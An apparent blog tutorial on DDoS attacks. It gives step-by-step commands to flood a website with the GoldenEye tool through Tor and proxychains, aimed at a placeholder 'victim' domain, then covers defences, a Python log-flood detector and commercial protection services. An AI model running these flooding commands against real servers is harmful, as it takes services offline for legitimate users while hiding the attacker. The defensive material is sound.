DDoS (Distributed Denial of Service) is an attack on a computer system that aims to bring it to failure, that is, to create conditions under which legitimate users cannot access the resources (servers) the system provides, or can access them only with difficulty.
How does this attack work and who uses it?
Each web server has a limit on the number of requests it can serve simultaneously. If the number of requests exceeds that limit, the following is quite possible:
- Server slowdown (requests are processed more slowly)
- Complete denial of service (requests are no longer served at all)
More often than not, attackers are after the second outcome: complete denial of service. Motives vary, from "protecting" users from fraudulent sites to plain boredom.
It should be said, though, that not only attackers but also "white-hat hackers", i.e. pentesters, use these attacks. With them, ethical hackers test the capacity of web servers and their ability to handle large numbers of simultaneous requests.
DDoS works as follows: the attacker builds a network of "zombie computers" (they do not really have to be computers; any device capable of sending requests will do) and then uses that network to conduct the attack.
Let's imagine a situation: the maximum volume of traffic a server can receive is 1 GB. The attacker tries to reach or exceed this threshold. If they succeed, the server first slows down and then may go down entirely.
Now the interesting part: how is such an attack conducted? Let us warn you right away: everything described below is provided for information purposes only. Do not attack other people's servers; doing so can get you into trouble with the law. You have been warned.
- EtherApe is a graphical network monitor that displays network activity visually. Hosts and links change in size with traffic, and protocols are shown in different colours.
- Tor service: Tor allows clients and relays to offer hidden services, that is, you can run a web server, SSH server, etc. without disclosing your IP address to your users.
- Proxychains: the latest version of Proxychains supports SOCKS5, SOCKS4 and HTTP CONNECT, and proxies of different types can be mixed in one chain.
- GoldenEye: GoldenEye is a Python application designed for security testing purposes only.
How to perform a DDOS attack on a website?
- Start EtherApe: etherape. A window will appear that graphically displays network activity.
- Start Tor: service tor start
- Download Goldeneye https://github.com/jseidl/GoldenEye wget https://github.com/jseidl/GoldenEye
- After downloading, unpack it into a folder: unzip GoldenEye-master.zip
- Start attack /GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com
- Add values for workers (-w), sockets (-s) and method (-m):
./goldeneye.py victim-website.com -w 100 -s 70 -m post
If you do not stop the attack, in some cases it will "explode". To stop the attack, simply press CTRL+C.
Done. After a while the server will slow down, and then it will probably go down.
General Protection against DDOS Attack
- Limit the connection rate per IP address.
- Use an IDS and a web application firewall.
- Tune per-IP connection settings (connection limits and timeouts).
- Secure your DNS servers.
- Deploy protective tools. Make sure the appropriate security controls are in place for both your networks and your applications. This includes key tools such as firewalls, network monitoring software and antivirus software, as well as threat monitoring systems. With these you can watch baseline network traffic and configure alerts for unusual behaviour.
- Keep everything up to date. All of these systems must be updated so that known bugs and problems are fixed. Detecting threats as early as possible is the best way to stop DDoS attacks from reaching critical network infrastructure and affecting end users.
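As an added defender-side example (not code from the article), the per-IP rate-limiting idea above can be turned into a simple detector: it parses access-log lines and reports every source whose request count exceeds a threshold within a sliding time window, which is what a flood of POST requests from a single worker pool looks like in the log. The log format (Common Log Format), the window, the threshold and the IP addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Parse one access-log line into (ip, datetime, method, path, status); None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path, int(status)


def flag_floods(lines, window_seconds=10, max_requests=20):
    """Return {ip: peak_requests_in_window} for every IP that sends more than
    max_requests within any sliding window of window_seconds.
    Each IP's lines are assumed to be in the order the server wrote them."""
    windows = defaultdict(deque)   # per-IP timestamps still inside the window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue               # skip malformed lines rather than crash
        ip, when, *_ = parsed
        q = windows[ip]
        q.append(when)
        while (when - q[0]).total_seconds() > window_seconds:
            q.popleft()            # drop timestamps that fell out of the window
        if len(q) > max_requests:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


def build_sample():
    """Constructed log (hypothetical addresses): one client POSTs 60 times in
    5 seconds, two other clients each make a single normal request."""
    lines = [
        f'203.0.113.5 - - [10/Oct/2023:13:55:{30 + i // 12:02d} +0000] "POST /login HTTP/1.1" 200 512'
        for i in range(60)
    ]
    lines.append('198.51.100.7 - - [10/Oct/2023:13:55:31 +0000] "GET /index.html HTTP/1.1" 200 2048')
    lines.append('192.0.2.9 - - [10/Oct/2023:13:55:33 +0000] "GET /about HTTP/1.1" 200 1024')
    return lines
```

A flagged address is a candidate for the per-IP connection limit; a flood spread across many addresses shows up instead as a rise in total request volume, so the aggregate rate should be watched alongside this per-source check.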
DDoS Prevention Tools
There are several tools that I recommend to prevent and stop DDoS attacks.
1. Security Event Manager
To track network behavior and mark threats before they become excessive, I like SolarWinds Security Event Manager (SEM).
The ability to respond quickly to a threat is vital, because security measures quickly become useless if they take too long to deploy. SEM includes automatic responses that can block suspicious IP addresses or USB devices, disable malicious devices or revoke their privileges, and kill applications that behave unexpectedly. This keeps delays in dealing with something like a DDoS attack to a minimum.
SEM also monitors file integrity and USB devices, so if something looks wrong it can be stopped.
SolarWinds SEM is available free of charge for a thirty-day trial. After that, pricing is per node.
2. Cloudflare
Cloudflare offers a flexible and scalable tool that integrates several DDoS prevention methods into one solution. It keeps malicious traffic from entering your network while the rest of your network stays functional and fast. Cloudflare uses a reputation database to track potential threats from attackers.
Cloudflare costs $200 per month for businesses; at the enterprise level you need to contact Cloudflare for a quote.
3. Imperva DDoS Protection
Imperva DDoS Protection covers the entire network and defends against attacks by absorbing high volumes of packets. It offers protection in both always-on and on-demand modes, depending on what suits your business best, and includes automatically updated dashboards showing information about attack traffic. The main disadvantage of the Imperva tool is that it is limited to protection against DDoS attacks.